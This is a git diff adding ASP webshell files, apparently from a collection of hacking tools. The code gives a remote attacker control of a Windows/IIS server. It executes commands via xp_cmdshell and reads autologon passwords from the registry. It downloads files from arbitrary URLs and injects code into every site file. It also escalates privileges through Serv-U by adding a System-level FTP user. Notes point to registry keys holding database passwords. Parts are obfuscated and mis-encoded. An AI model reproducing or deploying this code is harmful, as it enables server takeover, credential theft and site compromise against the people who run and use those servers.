      ܵ.ǷѾ Ȩ˿,õնRRS~~` Else`~
      ~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`
      ~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~
      me & sernaoginUautoL ~ & ϵͳʻ:Զ¼RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~
      rd & asswooginPautoL ~ & ʻ:Զ¼RRS ~~`End If`
    RRS ~~",Pso):End Sub:sub ReadREG() +RRS "
    " +RRS "עֵȡ

    " +RRS "" +RRS " " +RRS "
    " +RRS " " +RRS "" +RRS "


    " +if Request("thePath")<>"" then +On Error Resume Next +Set wsX = Server.CreateObject("WScript.Shell") +thePath=Request("thePath") +theArray=wsX.RegRead(thePath) +If IsArray(theArray) Then +For i=0 To UBound(theArray) +RRS "
  • " & theArray(i) +Next +Else +RRS "
  • " & theArray +End If +end if +end sub +Function downloads() +RW=RW&"

    ֱ

    " +RW=RW&"Զļ:
    " +RW=RW&"·: " +RW=RW&"ڸ " +RW=RW&"" +RW=RW&"
    " +Response.Write RW +If isDebugMode=False Then +On Error Resume Next +End If +Dim Http,theUrl,thePath,stream,getfileName,overWrite +theUrl=Request("theUrl") +thePath=Request("thePath") +overWrite=Request("overWrite") +Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream") +Set Http=Server.CreateObject("MSXML2.XMLHTTP") +If overWrite<>2 Then +overWrite=1 +End If +Http.Open "GET", theUrl, False +Http.Send() +If Http.ReadyState<>4 Then +End If +With stream +.Type=1 +.Mode=3 +.Open +.Write Http.ResponseBody +.Position=0 +.SaveToFile thePath, overWrite +If Err.Number=3004 Then +Err.Clear +getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/"))) +If getfileName="" Then +getfileName="12vh.txt" +End If +thePath=thePath & "\" & getfileName +.SaveToFile thePath, overWrite +End If +.Close +End With +chkErr(Err) +Set Http=Nothing +Set Stream=Nothing +If isDebugMode=False Then +On Error Resume Next +End If +End Function +FuncTion MMD() +SI="
    CMD
    ":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>"" thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," "," "):strREsult = REplAcE(strREsult,"<","<"):strREsult = REplAcE(strREsult,">",">"):strREsult = REplAcE(strREsult,chr(13),"
    "):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "
    "& strREsult +rrs ""©url&"" +end Function:Function adminab() +Response.Expires=0 +on error resume next +Set tN=server.createObject("Wscript.Network") +Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") +For Each admin in objGroup.Members +RRS admin.Name&"
    " +Next +if err then +RRS "̵IJа:Wscript.Network" +end if +End Function +sWHEEL1 = "jwt" +Function Encrypt(acd) +For i = 1 To Len(acd) step 1 +c=mid(acd,i,1) +if c="" then +d=mid(acd,i,2) +i=i+1 +e=replace(d,"","") +bbc=bbc&mid(sWHEEL1,cint(e),1) +else +bbc=bbc&c +end if +next +Encrypt=bbc +end Function +sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)˿ɨbr>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~` n IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam~`rt Libr>PoRRS~~`br>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`>
    b>ɨRRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub: +:Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......ر
    "):Else:RRS(targetip & ":" & portNum & ".......
    "):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction") +if not isnumeric(SUaction) then response.end +user = trim(request("u")) +pass = trim(request("p")) +port = trim(request("port")) +cmd = trim(request("c")) +f=trim(request("f")) +if f="" then +f=gpath() +else +f=left(f,2) +end if +ftpport = 65500 +timeout=3 +loginuser = "User " & user & vbCrLf +loginpass = "Pass " & pass & vbCrLf +deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf +mt = "SITE MAINTENANCE" & vbCrLf +newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf +newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ +"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ +"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ +"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ +"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ +"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ +"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf +quit = "QUIT" & vbCrLf +newuser=replace(newuser,"c:",f) +select case SUaction +case 1 +set a=Server.CreateObject("Microsoft.XMLHTTP") +a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", "" +a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit +set session("a")=a +RRS"
    " +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"
    " +RRS"" +case 2 +set b=Server.CreateObject("Microsoft.XMLHTTP") +b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", "" +b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit +set session("b")=b +RRS"
    " +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"
    " +RRS"" +case 3 +set c=Server.CreateObject("Microsoft.XMLHTTP") +c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" +c.send loginuser & loginpass & mt & deldomain & quit +set session("c")=c +RRS"
    Ȩ,ִ
    "&cmd&"

    " +RRS"" +RRS"
    " +case else +on error resume next +set a=session("a") +set b=session("b") +set c=session("c") +a.abort +Set a = Nothing +b.abort +Set b = Nothing +c.abort +Set c = Nothing +RRS"

    " +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"" +RRS"
    Serv-U Ȩ ASP
    û:
    ڣ
    ϵͳ·
    *
    " +RRS"" +RRS"
    " +end select +function Gpath() +on error resume next +err.clear +set f=Server.CreateObject("Scripting.FileSystemObject") +if err.number>0 then +gpath="c:" +exit function +end if +gpath=f.GetSpecialFolder(0) +gpath=lcase(left(gpath,2)) +set f=nothing:end function: +Case "Cplgm" +Fpath=Request("fd") +addcode = Request("code") +addcode2 = Request("code2") +pcfile=request("pcfile") +checkbox=request("checkbox") +ShowMsg=request("ShowMsg") +FType=request("FType") +M=request("M") +if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx" +if Fpath="\" then Fpath=Server.MapPath("\") +if Fpath="." or Fpath="" then Fpath=Server.MapPath(".") +if addcode="" then addcode="" +if checkbox="" then checkbox=request("checkbox") +if pcfile="" then +pcfileName=Request.ServerVariables("SCRIPT_NAME") +pcfilek=split(pcfileName,"/") +pcfilen=ubound(pcfilek) +pcfile=pcfilek(pcfilen) +end if +RRS ("
    վĿ¼- "&Server.MapPath("/")&"
    ") +RRS ("Ŀ¼- "&Server.MapPath(".")) +RRS "
    [" +if M="1" then RRS"-" +if M="2" then RRS"-˵" +if M="3" then RRS"-滻" +if M="" then response.end +RRS "]" +RRS "" +if M="1" then RRS "" +RRS "" +RRS "" +RRS "" +RRS "" +if M="3" then RRS "" +RRS "" +RRS "
    ļ· \վĿ¼.ΪĿ¼
    ظ ֹһҳжظĴ
    ųļ 벻뱻޸ĵļ磺1.asp|2.asp|3.asp
    ļͣ Ҫ޸ĵļ[չ]磺htm|html|asp|php|jsp|aspx|cgi
    " +if M="1" then RRS"Ҫҵ" +if M="2" then RRS"Ҫ" +if M="3" then RRS"Ҫ滻Ĵ룺" +RRS"
    滻Ϊ
    --ǽ--[ɹ ų ظ]
    " +if request("submit")="ʼִ" then +RRS"
    ִм¼
    " +call InsertAllFiles(Fpath,addcode,pcfile) +RRS"
    " +end if +sub att() +dim Path,FileName,NewTime,ShuXing +set path=request.Form("path1") +set fileName=request.Form("filename") +set newTime=request.Form("time") +set ShuXing=request.Form("shuxing") +RRS"
    " +RRS"·?q:
    " +RRS"ļ:
    " +RRS"޸ʱ:
    " +RRS"
    " +RRS"" +RRS"
    " +if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then +Set fso=Server.CreateObject("Scripting.FileSystemObject") +Set file=fso.getFile(path&fileName) +file.attributes=ShuXing +Set shell=Server.CreateObject("Shell.Application") +Set app_path=shell.NameSpace(server.mappath(".")) +Set app_file=app_path.ParseName(fileName) +app_file.Modifydate=newTime +RRS"

    ޸ļ  "&path&fileName&"  " +end if +end sub +function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"":Response.write" ":Response.write "





    ܿtest.phpʾ,ʾ֧PHP

    0 then +gpath="c:" +exit function +end if +gpath=f.GetSpecialFolder(0) +gpath=lcase(left(gpath,2)) +set f=nothing +end function +function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"ϲ֧jsp":Response.write" ":Response.write "





    ܿtest.jspʾ,ʾ֧jsp

    ɾԵļ(ȫԲſɾ,!)

    ":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"ϲ֧aspx":Response.write" ":Response.write "





    ܿTest.aspxʾ,ʾ֧asp.net

    Dz֧!ɼǵɾ":End function +function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ!":End function:function sam():Response.write "







    ":response.write"
    N
    ":End function:function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject") +set ofolder = Ofso.Getfolder(Session("FolderPath")) +if not ofolder.IsRootFolder then +Response.write "" +else +Response.write "" +end if +set Ofso=nothing +set ofolder=nothing +end function +Sub InsertAllFiles(Wpath,Wcode,pc) +Server.ScriptTimeout=999999999 +if right(Wpath,1)<>"\" then Wpath=Wpath &"\" +Set WFSO = CreateObject("Scripting.FileSystemObject") +on error resume next +Set f = WFSO.GetFolder(Wpath) +Set fc2 = f.files +For Each myfile in fc2 +Set FS1 = CreateObject("Scripting.FileSystemObject") +FType1=split(myfile.name,".") +FType2=ubound(FType1) +if Ftype2>0 then +FType3=LCase(FType1(FType2)) +else +FType3="" +end if +if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then +select case M +case "1" +if checkbox<>"checked" then +Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2) +tfile.writeline Wcode +RRS" "&Wpath&myfile.name +tfile.close +else +Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2) +if Instr(tfile1.readall,Wcode)=0 then +Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2) +tfile.writeline Wcode +RRS""&Wpath&myfile.name +tfile1.close +else +RRS" "&Wpath&myfile.name +tfile1.close +end if +Set tfile1=Nothing +end if +case "2" +Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2) +NewCode=Replace(tfile1.readall,Wcode,"") +Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True) +objCountFile.Write NewCode +objCountFile.Close +RRS""&Wpath&myfile.name +Set objCountFile=Nothing +case "3" +Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2) +NewCode=Replace(tfile1.readall,Wcode,addCode2) +Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True) +objCountFile.Write NewCode +objCountFile.Close +RRS""&Wpath&myfile.name +Set objCountFile=Nothing +case else +RRS".":response.end +end select +else +RRS" "&Wpath&myfile.name +end if +RRS " Down " +RRS "edit " +RRS "Del " +RRS "Copy " +RRS "Move
    " +Next +Set fsubfolers = f.SubFolders +For Each f1 in fsubfolers +NewPath=Wpath&""&f1.name +InsertAllFiles NewPath,Wcode,pc +Next +set tfile=nothing +Set FSO = Nothing +set tfile=nothing +set tfile2=nothing +Set WFSO = Nothing +End Sub +FuncTion su7() +response.write"
    " +response.write"

    " +response.write"------------------Serv-U Information------------------" +response.write"
    " +response.write"user:" +response.write"
    " +response.write"pwd :" +response.write"
    " +response.write"port:" +response.write"
    " +response.write"---------------------Add User!!! ---------------------
    " +response.write"Domain:   " +response.write"
    " +response.write"FTP USER:" +response.write"
    " +response.write"FTP PASS:" +response.write"
    " +response.write"FTP PORT:" +response.write"
    " +response.write"FTP PATH:" +response.write"" +response.write"
    " +response.write"Privilege" +response.write"" +response.write"

    " +response.write"

    " +response.write"" +response.write"Add User " +response.write" " +response.write"Del User

    " +response.write"

    " +response.write"" +response.write"

    " +response.write"
    " +user = request.Form("duser") +pass = request.Form("dpwd") +port = request.Form("dport") +domain = request.Form("domain") +fuser = request.Form("fuser") +fpass = request.Form("fpass") +fport = request.Form("fport") +fpath = request.Form("fpath") +privilege=request.Form("privilege") +select case privilege + case 2: + privilege="ReadOnly" + case 3: + privilege="Group" + case 4: + privilege="Domain" + case 5: + privilege="System" + end select + if request.Form("radiobutton") = "add" Then + +loginuser = "User " & user & vbCrLf +loginpass = "Pass " & pass & vbCrLf +mt = "SITE MAINTENANCE" & vbCrLf +newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf +newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _ + "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ + "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ + "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ + "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ + "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ + "-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf +quit = "QUIT" & vbCrLf + '-------- + 'On Error Resume Next + Set xPost = CreateObject("Microsoft.XMLHTTP") + xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", "" + xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit + Set xPost =nothing + response.write "
    FTP user "&fuser&" pass "&fpass&" at port "& fport &"
    " + elseif request.Form("radiobutton") = "del" Then + + loginuser = "User " & user & vbCrLf + loginpass = "Pass " & pass & vbCrLf + mt = "SITE MAINTENANCE" & vbCrLf + deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf + quit = "QUIT" & vbCrLf + Set xPost3 = CreateObject("MSXML2.XMLHTTP") + xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True + xPost3.Send loginuser & loginpass & mt & deluser & quit + Set xPOST3=nothing + response.write "
    FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted
    " + else + response.write "
    let's Start!!!
    " + end if +end function +Function fuzhutq1() +RRS"

    :Ȩ:

    " +RRS"360ɱdbļ滻:
    " +RRS"c:\Program Files\360\360SD\deepscan\Section\mutex.db
    " +RRS"c:\Program Files\360\360Safe\deepscan\Section\mutex.db
    " +RRS"C:\Program Files\360\360Safe\AntiSection\mutex.db
    " +RRS"Flashļ滻:
    " +RRS"C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx
    " +RRS"IISrewrite3 ļ滻
    " +RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
    " +RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
    " +RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
    " +RRS"DU MeterͳϢ־ļ滻
    " +RRS"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
    " +RRS"ŵɱļ滻:
    " +RRS"c:\Program Files\Common Files\Symantec Shared\Persist.bak
    " +RRS"c:\Program Files\Common Files\Symantec Shared\Validate.dat
    " +RRS"c:\Program Files\Common Files\Symantec Shared\Persist.Dat
    " +RRS"ļ滻:
    " +RRS"C:\WINDOWS\hchiblis.ibl
    " +RRS"һĿ¼ļ
    " +RRS"C:\7i24.com\iissafe\log\startandiischeck.txt
    " +RRS"C:\7i24.com\iissafe\log\scanlog.htm
    " +RRS":
    " +RRS"Zend: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
    " +RRS"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
    " +RRS"Ps:Ȩͨڸϵͳ
    " +end function +Function fuzhutq2() +RRS"

    :Ȩ:

    " +RRS"1`c:\windows\temphzhostµftp½¼vû
    " +RRS"2@mssql sa,mysql root뼰serv-uadministrator
    " +RRS"mysql root룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass
    " +RRS"sqlserver sa룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass
    " +RRS"Serv-u룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass
    " +RRS"Ϣhzhostsϵͳ6.x ƽݿ빤ʹ
    " +RRS"صַٶ 'hzhostsϵͳ6.x ƽݿ빤'
    " +RRS"Ps:Ȩͨڴϵͳ
    " +end function +Function fuzhutq3() +RRS"

    :NȨ:

    " +RRS"Ĭݿأ
    " +RRS"1.9棺host_date/%23host%20%23%20date%23.mdb
    " +RRS"1.96棺host_date/%23host%20%23%20date%23196.mdb
    " +RRS"巽ͨͬIIS,ȻվNվĿ¼£ַͨػصõsamysqlվϢkeyͨĴܣ
    " +'RRS"ַ:Ĵ" +RRS"Ps:Ȩͨڴϵͳ
    " +end function +Function fuzhutq4() +RRS"ȴ2ED" +end function +Function fuzhutq5() +if Request("Paths") ="" then +Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\" +if Session("paths")<>"" then Paths_str=Session("paths") + Response.Write "
    " + Response.Write "˳ԼĿ¼д,ΪṩһЩȫϢ!
    Ŀ¼,ԶĿ¼
    " + Response.Write "" + Response.Write "
    " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
    " +else +Response.Write "·
    " +CheckFile = (Request("CheckFile")="on") +CheckNextDir = (Request("CheckNextDir")="on") +ShowNoWriteDir = (Request("ShowNoWrite")="on") +NoCheckTemp = (Request("NoCheckTemp")="on") +Response.Write "ҪһʱԵ......
    " +response.Flush + +Session("paths") = Request("Paths") + +PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) +For i=LBound(PathsSplit) To UBound(PathsSplit) +if instr(PathsSplit(i),":")>0 then + ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir +End If +Next +Response.Write "[ɨ]
    " +end if +end function +Function cmd2() +response.write"
    " +response.write"" +response.write"
    " +response.write"" +end function +Function suftp() +RRS"

    ɰ汾Ϣ:

    " +RRS"
    " +RRS"
    Ա:
    " +RRS"
    Ա :
    " +RRS"
    SERV-U˿:
    " +RRS"
    ӵû:
    " +RRS"
    ӵû:
    " +RRS"
    ʺŵԵ·:
    " +RRS"
    ˿:
    " +RRS"
    ȷ" +RRS"
    ȷɾ" +RRS"

    " +Usr = request.Form("duser") +pwd = request.Form("dpwd") +port = request.Form("dport") +tuser = request.Form("tuser") +tpass = request.Form("tpass") +tpath = request.Form("tpath") +tport = request.Form("tport") +'Command = request.Form("dcmd") +if request.Form("radiobutton") = "add" Then +leaves = "User " & Usr & vbcrlf +leaves = leaves & "Pass " & pwd & vbcrlf +leaves = leaves & "SITE MAINTENANCE" & vbcrlf +'leaves = leaves & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf +leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _ +"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ +"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ +"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ +"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ +"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ +"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf +'leaves = leaves & "quit" & vbcrlf +'-------- +On Error Resume Next +Set xPost = CreateObject("MSXML2.XMLHTTP") +xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True +xPost.Send(leaves) +Set xPOST=nothing +RRS ("ɹִУFTP û: " & tuser & " " & ": " & tpass & " ·: " & tpath & " :)

    ") +else +leaves = "User " & Usr & vbcrlf +leaves = leaves & "Pass " & pwd & vbcrlf +leaves = leaves & "SITE MAINTENANCE" & vbcrlf +leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf +Set xPost3 = CreateObject("MSXML2.XMLHTTP") +xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True +xPost3.Send(leaves) +Set xPOST3=nothing +RRS "OKOKOK

    " +end if +End Function +Case "ScanDriveForm" + ScanDriveForm + Case "ScanDrive" + ScanDrive Request("Drive") + Case "ScFolder" + ScFolder Request("Folder") +case "apjdel":apjdel():case "Servu7x":su7():case "fuzhutq1":fuzhutq1():case "fuzhutq2":fuzhutq2():case "fuzhutq3":fuzhutq3():case "fuzhutq4":fuzhutq4():case "fuzhutq5":fuzhutq5():case "Cmd2":cmd2():case "suftp":suftp():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~ntm/h> \ No newline at end of file diff --git a/asp/不灭之魂.asp b/asp/不灭之魂.asp new file mode 100644 index 0000000..c5f2a5e --- /dev/null +++ b/asp/不灭之魂.asp @@ -0,0 +1,1355 @@ +<%@ LANGUAGE = VBScript.encode%> +<% +UserPass="icesword" ' +mNametitle ="ʹ"' +Copyright="ʹ"' Ȩ +errin ="," +SItEuRl="http://tophack.net/"' վַ +color1 ="green"' ӰЧɫ +fontcor ="red"' ʾɫ +'--------------------------------------------------------------------------------------- +' [֮] +'---------------------------------------------------------------------------------------- 